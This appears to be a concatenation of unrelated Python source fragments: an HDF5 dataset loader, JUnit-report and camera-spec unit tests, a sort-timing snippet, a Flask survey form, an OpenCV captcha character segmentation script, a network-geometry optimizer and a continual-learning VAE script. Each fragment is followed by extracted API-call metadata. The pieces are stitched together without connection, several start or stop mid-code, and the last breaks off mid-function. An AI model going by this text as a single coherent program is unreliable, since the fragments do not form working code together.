    def name(self):
        """Return the dataset's display name."""
        return 'rawdataDataset'

    @staticmethod
    def modify_commandline_options(parser, is_train):
        """Hook for dataset-specific CLI options; this dataset adds none."""
        return parser

    def initialize(self, opt):
        """Open <dataroot>/<phase>/A.h5 and B.h5 for reading.

        Args:
            opt: options object providing at least ``dataroot`` and
                ``phase`` ('train' or 'test').
        """
        self.opt = opt
        self.root = opt.dataroot
        self.dir_AB = os.path.join(opt.dataroot, opt.phase)  # phase: train / test
        self.A_paths = self.dir_AB + "/A.h5"
        self.B_paths = self.dir_AB + "/B.h5"
        self.frameA = h5py.File(self.A_paths, 'r')
        self.frameB = h5py.File(self.B_paths, 'r')

    def __len__(self):
        # Number of top-level datasets in A.h5 ("A1", "A2", ...).
        return len(self.frameA)

    def __getitem__(self, index):
        """Return the (A, B) pair for `index`; the HDF5 keys are 1-based."""
        A = self.frameA["A" + str(index + 1)]
        B = self.frameB["B" + str(index + 1)]
        # NOTE: the original computed input_nc/output_nc from
        # opt.which_direction here but never used them; that dead code and
        # the large commented-out crop/normalize block have been removed.
        return {'A': A, 'B': B, 'A_paths': self.A_paths, 'B_paths': self.B_paths}
#%hist -f rawdata_dataset.py
| [
"os.path.join",
"h5py.File"
] | [((796, 833), 'os.path.join', 'os.path.join', (['opt.dataroot', 'opt.phase'], {}), '(opt.dataroot, opt.phase)\n', (808, 833), False, 'import os\n'), ((1025, 1053), 'h5py.File', 'h5py.File', (['self.A_paths', '"""r"""'], {}), "(self.A_paths, 'r')\n", (1034, 1053), False, 'import h5py\n'), ((1076, 1104), 'h5py.File', 'h5py.File', (['self.B_paths', '"""r"""'], {}), "(self.B_paths, 'r')\n", (1085, 1104), False, 'import h5py\n')] |
"""
Copyright 2012-2019 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import datetime
import unittest
from unittest.mock import Mock
import urllib.error
from dateutil.tz import tzutc, tzlocal
from hqlib.metric_source import JunitTestReport
class JunitTestReportTest(unittest.TestCase):
    """ Unit tests for the Junit test report class. """
    # pylint: disable=protected-access
    def setUp(self):
        # Name-mangled to _JunitTestReportTest__junit; a fresh report per test.
        self.__junit = JunitTestReport()
    def test_test_report(self):
        """ Test retrieving a Junit test report. """
        # Stub the URL fetch with a fixed XML payload: 12 tests, 2 failures,
        # 1 skipped -> 9 passed.
        self.__junit._url_read = Mock(
            return_value='<testsuites>'
                         ' <testsuite tests="12" failures="2" errors="0" skipped="1" disabled="0">'
                         ' <testcase><failure/></testcase>'
                         ' <testcase><failure/></testcase>'
                         ' </testsuite>'
                         '</testsuites>')
        self.assertEqual(2, self.__junit.failed_tests('url'))
        self.assertEqual(9, self.__junit.passed_tests('url'))
        self.assertEqual(1, self.__junit.skipped_tests('url'))
    def test_multiple_test_suites(self):
        """ Test retrieving a Junit test report with multiple suites. """
        # Counts must be summed across both suites (including errors and
        # disabled tests).
        self.__junit._url_read = Mock(
            return_value='<testsuites>'
                         ' <testsuite tests="5" failures="1" errors="0" skipped="1" disabled="1">'
                         ' <testcase><failure/><failure/></testcase>'
                         ' </testsuite>'
                         ' <testsuite tests="3" failures="1" errors="1" skipped="0" disabled="0">'
                         ' <testcase><failure/></testcase>'
                         ' </testsuite>'
                         '</testsuites>')
        self.assertEqual(3, self.__junit.failed_tests('url'))
        self.assertEqual(3, self.__junit.passed_tests('url'))
        self.assertEqual(2, self.__junit.skipped_tests('url'))
    def test_http_error(self):
        """ Test that the default is returned when a HTTP error occurs. """
        self.__junit._url_read = Mock(side_effect=urllib.error.HTTPError(None, None, None, None, None))
        self.assertEqual(-1, self.__junit.failed_tests('raise'))
        self.assertEqual(-1, self.__junit.passed_tests('raise'))
        self.assertEqual(-1, self.__junit.skipped_tests('raise'))
    def test_missing_url(self):
        """ Test that the default is returned when no urls are provided. """
        self.assertEqual(-1, self.__junit.failed_tests())
        self.assertEqual(-1, self.__junit.passed_tests())
        self.assertEqual(-1, self.__junit.skipped_tests())
        self.assertEqual(datetime.datetime.min, self.__junit.datetime())
    def test_incomplete_xml(self):
        """ Test that the default is returned when the xml is incomplete. """
        self.__junit._url_read = Mock(return_value='<testsuites></testsuites>')
        self.assertEqual(-1, self.__junit.failed_tests('url'))
    def test_faulty_xml(self):
        """ Test incorrect XML. """
        self.__junit._url_read = Mock(return_value='<testsuites><bla>')
        self.assertEqual(-1, self.__junit.failed_tests('url'))
    def test_datetime_with_faulty_xml(self):
        """ Test incorrect XML. """
        self.__junit._url_read = Mock(return_value='<testsuites><bla>')
        self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
    def test_report_datetime(self):
        """ Test that the date and time of the test suite is returned. """
        self.__junit._url_read = Mock(
            return_value='<testsuites>'
                         ' <testsuite name="Art" timestamp="2016-07-07T12:26:44">'
                         ' </testsuite>'
                         '</testsuites>')
        # The report timestamp is UTC; the expected value converts it to
        # naive local time before comparing.
        self.assertEqual(
            datetime.datetime(2016, 7, 7, 12, 26, 44, tzinfo=tzutc()).astimezone(tzlocal()).replace(tzinfo=None),
            self.__junit.datetime('url'))
    def test_missing_report_datetime(self):
        """ Test that the minimum datetime is returned if the url can't be opened. """
        self.__junit._url_read = Mock(side_effect=urllib.error.HTTPError(None, None, None, None, None))
        self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
    def test_incomplete_xml_datetime(self):
        """ Test that the minimum datetime is returned when the xml is incomplete. """
        self.__junit._url_read = Mock(return_value='<testsuites></testsuites>')
        self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
    def test_incomplete_xml_no_timestamp(self):
        """ Test that the minimum datetime is returned when the xml is incomplete. """
        self.__junit._url_read = Mock(return_value='<testsuites><testsuite></testsuite></testsuites>')
        self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
    def test_urls(self):
        """ Test that the urls point to the HTML versions of the reports. """
        self.assertEqual(['http://server/html/htmlReport.html'],
                         self.__junit.metric_source_urls('http://server/junit/junit.xml'))
    def test_url_regexp(self):
        """ Test that the default regular expression to generate the HTML version of the urls can be changed. """
        junit = JunitTestReport(metric_source_url_re="junit.xml$", metric_source_url_repl="junit.html")
        self.assertEqual(['http://server/junit.html'], junit.metric_source_urls('http://server/junit.xml'))
| [
"dateutil.tz.tzutc",
"unittest.mock.Mock",
"hqlib.metric_source.JunitTestReport",
"dateutil.tz.tzlocal"
] | [((921, 938), 'hqlib.metric_source.JunitTestReport', 'JunitTestReport', ([], {}), '()\n', (936, 938), False, 'from hqlib.metric_source import JunitTestReport\n'), ((1058, 1271), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites> <testsuite tests="12" failures="2" errors="0" skipped="1" disabled="0"> <testcase><failure/></testcase> <testcase><failure/></testcase> </testsuite></testsuites>"""'}), '(return_value=\n \'<testsuites> <testsuite tests="12" failures="2" errors="0" skipped="1" disabled="0"> <testcase><failure/></testcase> <testcase><failure/></testcase> </testsuite></testsuites>\'\n )\n', (1062, 1271), False, 'from unittest.mock import Mock\n'), ((1751, 2059), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites> <testsuite tests="5" failures="1" errors="0" skipped="1" disabled="1"> <testcase><failure/><failure/></testcase> </testsuite> <testsuite tests="3" failures="1" errors="1" skipped="0" disabled="0"> <testcase><failure/></testcase> </testsuite></testsuites>"""'}), '(return_value=\n \'<testsuites> <testsuite tests="5" failures="1" errors="0" skipped="1" disabled="1"> <testcase><failure/><failure/></testcase> </testsuite> <testsuite tests="3" failures="1" errors="1" skipped="0" disabled="0"> <testcase><failure/></testcase> </testsuite></testsuites>\'\n )\n', (1755, 2059), False, 'from unittest.mock import Mock\n'), ((3359, 3405), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites></testsuites>"""'}), "(return_value='<testsuites></testsuites>')\n", (3363, 3405), False, 'from unittest.mock import Mock\n'), ((3570, 3608), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites><bla>"""'}), "(return_value='<testsuites><bla>')\n", (3574, 3608), False, 'from unittest.mock import Mock\n'), ((3787, 3825), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites><bla>"""'}), "(return_value='<testsuites><bla>')\n", (3791, 3825), False, 'from unittest.mock import Mock\n'), ((4049, 4175), 
'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites> <testsuite name="Art" timestamp="2016-07-07T12:26:44"> </testsuite></testsuites>"""'}), '(return_value=\n \'<testsuites> <testsuite name="Art" timestamp="2016-07-07T12:26:44"> </testsuite></testsuites>\'\n )\n', (4053, 4175), False, 'from unittest.mock import Mock\n'), ((4924, 4970), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites></testsuites>"""'}), "(return_value='<testsuites></testsuites>')\n", (4928, 4970), False, 'from unittest.mock import Mock\n'), ((5218, 5287), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites><testsuite></testsuite></testsuites>"""'}), "(return_value='<testsuites><testsuite></testsuite></testsuites>')\n", (5222, 5287), False, 'from unittest.mock import Mock\n'), ((5788, 5880), 'hqlib.metric_source.JunitTestReport', 'JunitTestReport', ([], {'metric_source_url_re': '"""junit.xml$"""', 'metric_source_url_repl': '"""junit.html"""'}), "(metric_source_url_re='junit.xml$', metric_source_url_repl=\n 'junit.html')\n", (5803, 5880), False, 'from hqlib.metric_source import JunitTestReport\n'), ((4370, 4379), 'dateutil.tz.tzlocal', 'tzlocal', ([], {}), '()\n', (4377, 4379), False, 'from dateutil.tz import tzutc, tzlocal\n'), ((4350, 4357), 'dateutil.tz.tzutc', 'tzutc', ([], {}), '()\n', (4355, 4357), False, 'from dateutil.tz import tzutc, tzlocal\n')] |
sort_functions = [
builtinsort, # see implementation above
insertion_sort, # see [[Insertion sort]]
insertion_sort_lowb, # ''insertion_sort'', where sequential search is replaced
# by lower_bound() function
qsort, # see [[Quicksort]]
qsortranlc, # ''qsort'' with randomly choosen ''pivot''
# and the filtering via list comprehension
qsortranpart, # ''qsortranlc'' with filtering via ''partition'' function
qsortranpartis, # ''qsortranpart'', where for a small input sequence lengths
] # ''insertion_sort'' is called
if __name__=="__main__":
import sys
sys.setrecursionlimit(10000)
write_timings(npoints=100, maxN=1024, # 1 <= N <= 2**10 an input sequence length
sort_functions=sort_functions,
sequence_creators = (ones, range, shuffledrange))
plot_timings()
| [
"sys.setrecursionlimit"
] | [((719, 747), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(10000)'], {}), '(10000)\n', (740, 747), False, 'import sys\n')] |
from flaskapp import app, db, mail
from flask import render_template, url_for
from flask import request, flash, redirect
# from flaskapp.model import User
from flaskapp.form import SurveyForm
from flask_mail import Message
@app.route('/', methods = ['POST', 'GET'])
def form():
form = SurveyForm()
if form.validate_on_submit():
# user = User(name=form.name.data, email=form.email.data)
# db.session.add(user)
# db.session.commit()
body = """
Thank you {} for filling the form!😊
""".format(form.name.data)
msg = Message(subject="survey form", sender='', recipients=[form.email.data], body=body)
mail.send(msg)
flash('Your feedback is successfully submitted!!', 'success')
return redirect(url_for('thank'))
return render_template('form.html', form=form)
@app.route('/thank')
def thank():
return render_template('thank.html')
| [
"flask.render_template",
"flaskapp.app.route",
"flask.flash",
"flask.url_for",
"flaskapp.form.SurveyForm",
"flask_mail.Message",
"flaskapp.mail.send"
] | [((232, 271), 'flaskapp.app.route', 'app.route', (['"""/"""'], {'methods': "['POST', 'GET']"}), "('/', methods=['POST', 'GET'])\n", (241, 271), False, 'from flaskapp import app, db, mail\n'), ((884, 903), 'flaskapp.app.route', 'app.route', (['"""/thank"""'], {}), "('/thank')\n", (893, 903), False, 'from flaskapp import app, db, mail\n'), ((299, 311), 'flaskapp.form.SurveyForm', 'SurveyForm', ([], {}), '()\n', (309, 311), False, 'from flaskapp.form import SurveyForm\n'), ((840, 879), 'flask.render_template', 'render_template', (['"""form.html"""'], {'form': 'form'}), "('form.html', form=form)\n", (855, 879), False, 'from flask import render_template, url_for\n'), ((930, 959), 'flask.render_template', 'render_template', (['"""thank.html"""'], {}), "('thank.html')\n", (945, 959), False, 'from flask import render_template, url_for\n'), ((595, 681), 'flask_mail.Message', 'Message', ([], {'subject': '"""survey form"""', 'sender': '""""""', 'recipients': '[form.email.data]', 'body': 'body'}), "(subject='survey form', sender='', recipients=[form.email.data],\n body=body)\n", (602, 681), False, 'from flask_mail import Message\n'), ((699, 713), 'flaskapp.mail.send', 'mail.send', (['msg'], {}), '(msg)\n', (708, 713), False, 'from flaskapp import app, db, mail\n'), ((723, 784), 'flask.flash', 'flash', (['"""Your feedback is successfully submitted!!"""', '"""success"""'], {}), "('Your feedback is successfully submitted!!', 'success')\n", (728, 784), False, 'from flask import request, flash, redirect\n'), ((810, 826), 'flask.url_for', 'url_for', (['"""thank"""'], {}), "('thank')\n", (817, 826), False, 'from flask import render_template, url_for\n')] |
import unittest
from kameramera import camera
class Camera(unittest.TestCase):
def setUp(self):
self.camera = camera.Camera(camera_id='canon_ae1')
def test_general_manufacturer(self):
self.assertEqual(self.camera.general.manufacturer, 'Canon')
def test_general_name(self):
self.assertEqual(self.camera.general.name, 'Canon AE-1')
def test_general_type(self):
self.assertEqual(self.camera.general.type, 'SLR')
def test_general_format(self):
self.assertEqual(self.camera.general.format, '24x35')
def test_general_made_in(self):
self.assertEqual(self.camera.general.made_in, 'Japan')
def test_general_date(self):
self.assertEqual(self.camera.general.date, '1976-1984')
def test_general_body_construction(self):
self.assertEqual(self.camera.general.body_construction, 'metal')
def test_general_mount_threads(self):
self.assertEqual(self.camera.general.mount_threads, '1/4"')
def test_general_dimension(self):
self.assertEqual(self.camera.general.dimension, '141x87x47.5 mm')
def test_general_weight(self):
self.assertEqual(self.camera.general.weight, '620g')
def test_optics_lenses(self):
self.assertEqual(self.camera.optics.lenses, 'interchangeable')
def test_optics_lenses_mount(self):
self.assertEqual(self.camera.optics.lenses_mount, 'Canon FD')
def test_sighting_type(self):
self.assertEqual(self.camera.sighting.type, 'fixed eye-level pentaprism')
def test_sighting_display(self):
self.assertEqual(self.camera.sighting.display, False)
def test_sighting_viewfinder_rangefinder(self):
self.assertEqual(self.camera.sighting.viewfinder.rangefinder,
['split_image', 'microprism'])
def test_sighting_viewfinder_aperture(self):
self.assertEqual(self.camera.sighting.viewfinder.aperture, True)
def test_sighting_viewfinder_exposure_indicator(self):
self.assertEqual(self.camera.sighting.viewfinder.exposure_indicator, True)
def test_sighting_viewfinder_flash_indicator(self):
self.assertEqual(self.camera.sighting.viewfinder.flash_indicator, True)
def test_focus_manual(self):
self.assertEqual(self.camera.focus.manual, True)
def test_focus_autofocus(self):
self.assertEqual(self.camera.focus.autofocus, False)
def test_focus_stabilization(self):
self.assertEqual(self.camera.focus.stabilization, False)
def test_focus_depth_of_field(self):
self.assertEqual(self.camera.focus.depth_of_field, True)
def test_shutter_type(self):
self.assertEqual(self.camera.shutter.type, None)
def test_shutter_shutter_speeds(self):
self.assertEqual(self.camera.shutter.shutter_speeds, [
'2',
'1',
'1/2',
'1/4',
'1/8',
'1/15',
'1/30',
'1/60',
'1/125',
'1/250',
'1/500',
'1/1000'
])
def test_shutter_pose(self):
self.assertEqual(self.camera.shutter.pose, 'B')
def test_shutter_self_timer(self):
self.assertEqual(self.camera.shutter.self_timer, 10)
def test_exposure_mode(self):
self.assertEqual(self.camera.exposure.mode, ['M','S'])
def test_exposure_correction(self):
self.assertEqual(self.camera.exposure.correction, 1.5)
def test_exposure_measure_type(self):
self.assertEqual(self.camera.exposure.measure.type, 'TTL')
def test_exposure_measure_light_sensor(self):
self.assertEqual(self.camera.exposure.measure.light_sensor,
'silicon photon cell')
def test_exposure_measure_metering_mode(self):
self.assertEqual(self.camera.exposure.measure.metering_mode,
'center-weighted average metering')
def test_exposure_measure_memory(self):
self.assertEqual(self.camera.exposure.measure.memory, True)
def test_film_format(self):
self.assertEqual(self.camera.film.format, 135)
def test_film_advance(self):
self.assertEqual(self.camera.film.advance, 'manual')
def test_film_frame_counter(self):
self.assertEqual(self.camera.film.frame_counter, True)
def test_film_film_speed(self):
self.assertEqual(self.camera.film.film_speed, [
25,
32,
40,
50,
64,
80,
100,
125,
160,
200,
250,
320,
400,
500,
640,
800,
1000,
1250,
1600,
2000,
2500,
3200
])
def test_flash_built_in(self):
self.assertEqual(self.camera.flash.built_in, False)
def test_flash_hot_shoe(self):
self.assertEqual(self.camera.flash.hot_shoe, True)
def test_flash_synchronization(self):
self.assertEqual(self.camera.flash.synchronization, '1/60')
def test_power_required(self):
self.assertEqual(self.camera.power.required, True)
def test_power_source_number(self):
self.assertEqual(self.camera.power.source[0].number, 1)
def test_power_source_voltage(self):
self.assertEqual(self.camera.power.source[0].voltage, 6)
def test_power_source_type(self):
self.assertEqual(self.camera.power.source[0].type, [
'alkaline-manganese',
'silver oxyde',
'lithium'
]) | [
"kameramera.camera.Camera"
] | [((125, 161), 'kameramera.camera.Camera', 'camera.Camera', ([], {'camera_id': '"""canon_ae1"""'}), "(camera_id='canon_ae1')\n", (138, 161), False, 'from kameramera import camera\n')] |
import matplotlib.pyplot as plt
import numpy as np
import math
import cv2
kernel = np.ones((3, 3), np.int8)
# 去除雜訊
def eraseImage (image):
return cv2.erode(image, kernel, iterations = 1)
# 模糊圖片
def blurImage (image):
return cv2.GaussianBlur(image, (5, 5), 0)
# 銳利化圖片
# threshold1,2,較小的值為作為偵測邊界的最小值
def edgedImage (image, threshold1 = 30, threshold2 = 150):
return cv2.Canny(image, threshold1, threshold2)
# 圖片膨脹
def dilateImage (image, level = (3, 3)):
level = np.ones(level, np.int8)
return cv2.dilate(image, level, iterations = 1)
# 獲得字元外盒
def getCharBox (image, minW = 15, minH = 15):
def setBoundingBox (contours):
box = []
for cnt in contours:
(x, y, w, h) = cv2.boundingRect(cnt)
# NOTE: 字元有一定大小,所以其盒子寬高也有基本門檻值
if w > minW and h > minH:
box.append((x, y, w, h))
# cv2.rectangle(image, (x, y), (x + w, y + h), (127, 255, 0), 2) # 依照contour畫邊界
# cv2.imshow('test', image)
return box
def removeInnerBox (boxes):
# 對各個字元的外盒,依照 x 大小排列
boxes.sort(key = lambda e: e[0])
results = [boxes[0]]
for i in range(len(boxes) - 1):
x1, y1, w1, h1 = boxes[i]
x2, y2, w2, h2 = boxes[i+1]
if (x2 > x1 and x2 + w2 > x1 + w1):
results.append(boxes[i+1])
return results
contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
boundingBox = setBoundingBox(contours)
boundingBox = removeInnerBox(boundingBox)
return boundingBox
def showCharBox (image, boxes):
for x, y, w, h in boxes:
cv2.rectangle(image, (x, y), (x + w, y + h), (127, 255, 0), 2) # 依照contour畫邊界
cv2.imshow('charBox', image)
cv2.waitKey(0)
def showCountour (contours):
row = 2
col = math.ceil(len(contours)/row)
for i, cnt in enumerate(contours, start = 1):
x = []
y = []
# plt.subplot(row, col, i)
for point in cnt:
x.append(point[0][0])
y.append(point[0][1])
plt.plot(x, y)
plt.show()
def resizeImage (image, charBox, size = (50, 50)):
results = []
for (x, y, w, h) in charBox:
char = image[y:y+h, x:x+w]
char = cv2.resize(char, size)
results.append(char)
return results
def diffPictures (picA, picB):
err = np.sum( (picA.astype('float') - picB.astype('float')) ** 2 )
err /= float(picA.shape[0] * picA.shape[1])
return err
if __name__ == '__main__':
pic = cv2.imread('../captcha_Images/0.png')
print(pic)
cv2.imshow('pic', pic)
cv2.waitKey(0)
erosion = eraseImage(pic)
blured = blurImage(erosion)
edged = edgedImage(blured)
dilated = dilateImage(edged)
charBox = getCharBox(dilated)
showCharBox(dilated, charBox)
dilated = dilateImage(edged, (4, 4))
chars = resizeImage(dilated, charBox)
# input("Press Enter to continue.")
# c = result[0][0][0][0]
# print(c)
# plt.plot(c)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"cv2.rectangle",
"numpy.ones",
"cv2.resize",
"cv2.erode",
"matplotlib.pyplot.plot",
"cv2.boundingRect",
"cv2.imshow",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.findContours",
"cv2.dilate",
"cv2.Canny",
"cv2.imread",
"cv2.GaussianBlur",
"matplotlib.pyplot.show"
] | [((84, 108), 'numpy.ones', 'np.ones', (['(3, 3)', 'np.int8'], {}), '((3, 3), np.int8)\n', (91, 108), True, 'import numpy as np\n'), ((150, 188), 'cv2.erode', 'cv2.erode', (['image', 'kernel'], {'iterations': '(1)'}), '(image, kernel, iterations=1)\n', (159, 188), False, 'import cv2\n'), ((231, 265), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['image', '(5, 5)', '(0)'], {}), '(image, (5, 5), 0)\n', (247, 265), False, 'import cv2\n'), ((374, 414), 'cv2.Canny', 'cv2.Canny', (['image', 'threshold1', 'threshold2'], {}), '(image, threshold1, threshold2)\n', (383, 414), False, 'import cv2\n'), ((474, 497), 'numpy.ones', 'np.ones', (['level', 'np.int8'], {}), '(level, np.int8)\n', (481, 497), True, 'import numpy as np\n'), ((507, 545), 'cv2.dilate', 'cv2.dilate', (['image', 'level'], {'iterations': '(1)'}), '(image, level, iterations=1)\n', (517, 545), False, 'import cv2\n'), ((1298, 1361), 'cv2.findContours', 'cv2.findContours', (['image', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (1314, 1361), False, 'import cv2\n'), ((1940, 1950), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1948, 1950), True, 'import matplotlib.pyplot as plt\n'), ((2352, 2389), 'cv2.imread', 'cv2.imread', (['"""../captcha_Images/0.png"""'], {}), "('../captcha_Images/0.png')\n", (2362, 2389), False, 'import cv2\n'), ((2405, 2427), 'cv2.imshow', 'cv2.imshow', (['"""pic"""', 'pic'], {}), "('pic', pic)\n", (2415, 2427), False, 'import cv2\n'), ((2430, 2444), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2441, 2444), False, 'import cv2\n'), ((2803, 2817), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2814, 2817), False, 'import cv2\n'), ((2820, 2843), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2841, 2843), False, 'import cv2\n'), ((1532, 1594), 'cv2.rectangle', 'cv2.rectangle', (['image', '(x, y)', '(x + w, y + h)', '(127, 255, 0)', '(2)'], {}), '(image, (x, y), (x + w, y + h), (127, 255, 
0), 2)\n', (1545, 1594), False, 'import cv2\n'), ((1615, 1643), 'cv2.imshow', 'cv2.imshow', (['"""charBox"""', 'image'], {}), "('charBox', image)\n", (1625, 1643), False, 'import cv2\n'), ((1648, 1662), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1659, 1662), False, 'import cv2\n'), ((1923, 1937), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {}), '(x, y)\n', (1931, 1937), True, 'import matplotlib.pyplot as plt\n'), ((2091, 2113), 'cv2.resize', 'cv2.resize', (['char', 'size'], {}), '(char, size)\n', (2101, 2113), False, 'import cv2\n'), ((697, 718), 'cv2.boundingRect', 'cv2.boundingRect', (['cnt'], {}), '(cnt)\n', (713, 718), False, 'import cv2\n')] |
import pprint
from nn_wtf.parameter_optimizers.neural_network_optimizer import NeuralNetworkOptimizer
__author__ = '<NAME> <<EMAIL>>'
class BruteForceOptimizer(NeuralNetworkOptimizer):
DEFAULT_LAYER_SIZES = (
(32, 48, 64), # (32, 48, 64, 80, 96, 128),
(32, 48, 64, 80, 96, 128),
(None, 16, 32, 48)
)
# self, tested_network, input_size, output_size, desired_training_precision,
def __init__(
self, tested_network, input_size, output_size, desired_training_precision,
layer_sizes=None, learning_rate=None, verbose=False, batch_size=100
):
super().__init__(
tested_network, input_size, output_size, desired_training_precision, verbose=verbose, batch_size=batch_size
)
self.learning_rate = learning_rate if learning_rate else self.DEFAULT_LEARNING_RATE
self.layer_sizes = self.DEFAULT_LAYER_SIZES if layer_sizes is None else layer_sizes
def best_parameters(self, data_sets, max_steps):
results = self.time_all_tested_geometries(data_sets, max_steps)
return results[0].optimization_parameters
def brute_force_optimal_network_geometry(self, data_sets, max_steps):
return self.best_parameters(data_sets, max_steps).geometry
def time_all_tested_geometries(self, data_sets, max_steps):
results = []
for geometry in self.get_network_geometries():
run_info = self.timed_run_training(
data_sets,
NeuralNetworkOptimizer.OptimizationParameters(geometry, self.learning_rate),
max_steps=max_steps
)
results.append(run_info)
results = sorted(results, key=lambda r: r.cpu_time)
if self.verbose: pprint.pprint(results, width=100)
return results
def get_network_geometries(self):
return ((l1, l2, l3)
for l1 in self.layer_sizes[0]
for l2 in self.layer_sizes[1] if l2 <= l1
for l3 in self.layer_sizes[2] if l3 is None or l3 <= l2)
def brute_force_optimize_learning_rate(self):
raise NotImplementedError()
| [
"pprint.pprint",
"nn_wtf.parameter_optimizers.neural_network_optimizer.NeuralNetworkOptimizer.OptimizationParameters"
] | [((1758, 1791), 'pprint.pprint', 'pprint.pprint', (['results'], {'width': '(100)'}), '(results, width=100)\n', (1771, 1791), False, 'import pprint\n'), ((1509, 1584), 'nn_wtf.parameter_optimizers.neural_network_optimizer.NeuralNetworkOptimizer.OptimizationParameters', 'NeuralNetworkOptimizer.OptimizationParameters', (['geometry', 'self.learning_rate'], {}), '(geometry, self.learning_rate)\n', (1554, 1584), False, 'from nn_wtf.parameter_optimizers.neural_network_optimizer import NeuralNetworkOptimizer\n')] |
import numpy as np
import tensorflow as tf
import sys, os
sys.path.extend(['alg/', 'models/'])
from visualisation import plot_images
from encoder_no_shared import encoder, recon
from utils import init_variables, save_params, load_params, load_data
from eval_test_ll import construct_eval_func
dimZ = 50
dimH = 500
n_channel = 128
batch_size = 50
lr = 1e-4
K_mc = 10
checkpoint = -1
def main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd):
# set up dataset specific stuff
from config import config
labels, n_iter, dimX, shape_high, ll = config(data_name, n_channel)
if data_name == 'mnist':
from mnist import load_mnist
if data_name == 'notmnist':
from notmnist import load_notmnist
# import functionalities
if method == 'onlinevi':
from bayesian_generator import generator_head, generator_shared, \
generator, construct_gen
from onlinevi import construct_optimizer, init_shared_prior, \
update_shared_prior, update_q_sigma
if method in ['ewc', 'noreg', 'laplace', 'si']:
from generator import generator_head, generator_shared, generator, construct_gen
if method in ['ewc', 'noreg']:
from vae_ewc import construct_optimizer, lowerbound
if method == 'ewc': from vae_ewc import update_ewc_loss, compute_fisher
if method == 'laplace':
from vae_laplace import construct_optimizer, lowerbound
from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum
if method == 'si':
from vae_si import construct_optimizer, lowerbound, update_si_reg
# then define model
n_layers_shared = 2
batch_size_ph = tf.placeholder(tf.int32, shape=(), name='batch_size')
dec_shared = generator_shared(dimX, dimH, n_layers_shared, 'sigmoid', 'gen')
# initialise sessions
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
string = method
if method in ['ewc', 'laplace', 'si']:
string = string + '_lbd%.1f' % lbd
if method == 'onlinevi' and K_mc > 1:
string = string + '_K%d' % K_mc
path_name = data_name + '_%s/' % string
if not os.path.isdir('save/'):
os.mkdir('save/')
if not os.path.isdir('save/'+path_name):
os.mkdir('save/'+path_name)
print('create path save/' + path_name)
filename = 'save/' + path_name + 'checkpoint'
if checkpoint < 0:
print('training from scratch')
old_var_list = init_variables(sess)
else:
load_params(sess, filename, checkpoint)
checkpoint += 1
# visualise the samples
N_gen = 10**2
path = 'figs/' + path_name
if not os.path.isdir('figs/'):
os.mkdir('figs/')
if not os.path.isdir(path):
os.mkdir(path)
print('create path ' + path)
X_ph = tf.placeholder(tf.float32, shape=(batch_size, dimX), name = 'x_ph')
# now start fitting
N_task = len(labels)
gen_ops = []
X_valid_list = []
X_test_list = []
eval_func_list = []
result_list = []
if method == 'onlinevi':
shared_prior_params = init_shared_prior()
if method in ['ewc', 'noreg']:
ewc_loss = 0.0
if method == 'laplace':
F_accum = init_fisher_accum()
laplace_loss = 0.0
if method == 'si':
old_params_shared = None
si_reg = None
n_layers_head = 2
n_layers_enc = n_layers_shared + n_layers_head - 1
for task in range(1, N_task+1):
# first load data
if data_name == 'mnist':
X_train, X_test, _, _ = load_mnist(digits = labels[task-1], conv = False)
if data_name == 'notmnist':
X_train, X_test, _, _ = load_notmnist(digits = labels[task-1], conv = False)
N_train = int(X_train.shape[0] * 0.9)
X_valid_list.append(X_train[N_train:])
X_train = X_train[:N_train]
X_test_list.append(X_test)
# define the head net and the generator ops
dec = generator(generator_head(dimZ, dimH, n_layers_head, 'gen_%d' % task), dec_shared)
enc = encoder(dimX, dimH, dimZ, n_layers_enc, 'enc_%d' % task)
gen_ops.append(construct_gen(dec, dimZ, sampling=False)(N_gen))
print('construct eval function...')
eval_func_list.append(construct_eval_func(X_ph, enc, dec, ll, \
batch_size_ph, K = 100, sample_W = False))
# then construct loss func and fit func
print('construct fit function...')
if method == 'onlinevi':
fit = construct_optimizer(X_ph, enc, dec, ll, X_train.shape[0], batch_size_ph, \
shared_prior_params, task, K_mc)
if method in ['ewc', 'noreg']:
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], ewc_loss)
if method == 'ewc':
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
